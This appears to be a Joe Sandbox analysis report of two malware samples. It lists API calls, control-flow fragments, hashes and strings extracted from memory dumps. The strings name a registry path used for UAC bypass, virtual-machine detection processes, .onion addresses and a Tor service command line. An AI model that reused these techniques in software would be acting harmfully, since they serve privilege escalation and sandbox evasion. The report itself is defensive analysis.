                                                                                                                                                                                                                                                              • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                                                                                                                                                                                              • API String ID: 0-3530339137
                                                                                                                                                                                                                                                              • Opcode ID: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 011707EE
                                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0117080E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_1170000_sUyDoVTGsfEnMY0oeyexTBut.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction ID: 174029d3402c47cbeefb4f5bba6325a560fb38a43e0ee9e65e9618db05da0505
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13F096316007156FE7243BF9A88DB6FB7F8AF4E725F100528F643912C0DB70E8458A61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 13 1170485-11704bf call 1170798 16 11704c1-11704f4 VirtualAlloc call 1170512 13->16 17 117050d 13->17 19 11704f9-117050b 16->19 17->17 19->17
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 011704D6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_1170000_sUyDoVTGsfEnMY0oeyexTBut.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction ID: 2e67cf3d54b687679cc53ce6c70565bd464f98ad1938219fb581916462b5f785
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E113C79A00208EFDB01DF98C985E99BFF5AF08350F058094F9489B361D371EA90DF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                                                                                                                                                                                              • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                                                                                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                                                                                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                                                                                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                                                                                                                                                                                              • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                                                                                                                                                                                              • %, xrefs: 00433B64
                                                                                                                                                                                                                                                              • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                                                                                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_400000_sUyDoVTGsfEnMY0oeyexTBut.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • API String ID: 0-2845907608
                                                                                                                                                                                                                                                              • Opcode ID: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                                                                                                                                                                                              • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                                                                                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                                                                                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_400000_sUyDoVTGsfEnMY0oeyexTBut.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • API String ID: 0-3530339137
                                                                                                                                                                                                                                                              • Opcode ID: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 010227EE
                                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0102280E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, Offset: 01022000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1022000_VvPx7JMqkEvTJAQ2rPS2y2wf.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction ID: 4a569258bbb730b22cbc9acf78d0f3d0392d83352f4479364ffe5e8861f80bb6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BF096312007316FE7203BF9AC8DBAE76E8BF49625F100568F686910C0DBB0E9454661
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 13 1022485-10224bf call 1022798 16 10224c1-10224f4 VirtualAlloc call 1022512 13->16 17 102250d 13->17 19 10224f9-102250b 16->19 17->17 19->17
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 010224D6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, Offset: 01022000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1022000_VvPx7JMqkEvTJAQ2rPS2y2wf.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                                                                                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                                                                                                                                                                                              • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                                                                                                                                                                                              • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                                                                                                                                                                                              • %, xrefs: 00433B64
                                                                                                                                                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                                                                                                                                                                                              • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                                                                                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.3183446408.0000000000840000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000C77000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000CCF000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000CD3000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000CEF000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000CF6000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_VvPx7JMqkEvTJAQ2rPS2y2wf.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • API String ID: 0-2845907608
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                                                                                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                                                                                                                                                                                              • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                                                                                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.3183446408.0000000000840000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000C77000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000CCF000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000CD3000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000CEF000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000012.00000002.3183446408.0000000000CF6000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_VvPx7JMqkEvTJAQ2rPS2y2wf.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • API String ID: 0-3530339137
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%